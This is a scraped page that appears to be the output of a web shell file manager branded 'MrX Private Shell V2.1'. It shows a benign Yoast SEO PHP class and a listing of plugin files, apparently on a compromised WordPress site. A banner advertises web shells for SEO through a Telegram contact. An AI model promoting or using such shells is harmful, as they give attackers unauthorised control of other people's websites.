__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Yoast\WP\SEO\Initializers;
use Yoast\WP\SEO\Conditionals\No_Conditionals;
/**
* Adds custom headers to the list of plugin headers to read.
*/
class Plugin_Headers implements Initializer_Interface {
use No_Conditionals;
/**
* Hooks into the list of the plugin headers.
*
* @return void
*/
public function initialize() {
\add_filter( 'extra_plugin_headers', [ $this, 'add_requires_yoast_seo_header' ] );
}
/**
* Add the `Requires Yoast SEO` header to the list of headers.
*
* @param array<string> $headers The headers.
*
* @return array<string> The updated headers.
*/
public function add_requires_yoast_seo_header( $headers ) {
$headers[] = 'Requires Yoast SEO';
return $headers;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| crawl-cleanup-permalinks.php | File | 5.39 KB | 0775 |
|
| disable-core-sitemaps.php | File | 2.87 KB | 0775 |
|
| initializer-interface.php | File | 345 B | 0775 |
|
| migration-runner.php | File | 4.11 KB | 0775 |
|
| plugin-headers.php | File | 740 B | 0775 |
|
| woocommerce.php | File | 783 B | 0775 |
|